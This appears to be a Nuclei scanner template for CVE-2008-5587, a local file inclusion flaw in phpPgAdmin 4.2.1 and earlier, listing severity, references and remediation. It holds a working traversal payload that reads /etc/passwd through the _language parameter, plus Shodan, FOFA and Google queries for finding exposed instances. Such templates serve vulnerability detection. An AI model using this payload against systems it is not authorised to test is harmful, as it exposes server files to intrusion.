id: CVE-2008-5587 info: name: phpPgAdmin <=4.2.1 - Local File Inclusion author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. impact: | An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/7363 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 epss-percentile: 0.89734 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin shodan-query: - http.title:"phpPgAdmin" - http.title:phppgadmin - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4a0a00473045022100912e1228880396cbbedb45de0a602506bea640e6cd8aaa621d0ec6707414e7c30220267eb7b0e7a3731120937298835fa180c09e4f109d5ef5a053292b64c87d6af7:922c64590222798bb761d5b6d8e72950